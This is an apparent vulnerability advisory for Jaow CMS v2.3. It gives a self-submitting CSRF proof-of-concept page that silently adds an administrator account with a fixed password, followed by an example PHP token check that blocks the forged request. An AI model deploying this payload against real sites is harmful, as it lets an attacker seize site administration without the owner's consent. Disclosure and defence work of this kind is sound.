Jaow CMS CSRF Exploit

Summary

Jaow CMS v2.3 suffers from a cross-site request forgery (CSRF) vulnerability.

Credit:

The information has been provided by DaOne.


Details

Vulnerable Systems:
 * Jaow CMS v2.3

[#] [ CSRF Add Admin ]

<html>
<body onload='document.form0.submit();'>
<form method='POST' name='form0' action='http://[target]/administration/utilisateur.php'>
<input type='hidden' name='Nom' value='webadmin'/>
<input type='hidden' name='Prenom' value='webadmin'/>
<input type='hidden' name='Pseudo' value='webadmin'/>
<input type='hidden' name='Mdp' value='pass123'/>
</form>
</body>
</html>
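
One way a handler like administration/utilisateur.php could reject the forged request above, as an added example (not Jaow CMS code and not part of the original advisory): a per-session token verified on every POST, combined with a SameSite session cookie. The names csrf_token() and csrf_check() and the csrf_token field are assumptions; Nom, Prenom, Pseudo and Mdp are the fields from the form above.

```php
<?php
// Added example: hypothetical guard for a state-changing admin handler.
// Not Jaow CMS code; csrf_token()/csrf_check() are assumed names.

// SameSite=Strict keeps the session cookie off cross-site form posts (PHP 7.3+).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_check(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && $sent !== ''
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_check($_POST)) {
        // The auto-submitting page above carries no token, so it stops here.
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Token verified: the existing add-user logic (Nom, Prenom, Pseudo, Mdp) runs here.
    exit('User request accepted');
}
?>
<form method="POST" action="utilisateur.php">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input name="Nom"> <input name="Prenom"> <input name="Pseudo">
  <input type="password" name="Mdp">
  <button type="submit">Add user</button>
</form>
```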

Disclosure Timeline:
Published: 2012-08-17
